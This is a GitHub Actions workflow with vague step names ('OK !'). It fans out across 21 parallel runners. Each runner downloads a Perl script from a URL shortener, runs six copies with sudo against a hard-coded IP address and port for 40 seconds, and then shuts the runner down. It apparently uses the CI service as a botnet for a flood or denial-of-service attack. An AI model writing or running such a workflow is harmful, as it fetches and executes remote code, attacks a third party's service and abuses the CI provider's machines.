name:  d

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 21
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21]

    steps:
      - name: OK !
        run: |
          wget https://curl.by/7NEU8/dc.pl -O dc.pl
          chmod +x dc.pl
          PIDS=()
          for i in {1..6}; do
            sudo timeout 40 perl dc.pl 104.29.146.249 19302 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: |
          sleep 40
          sudo shutdown now
          sudo reboot
          exit 0
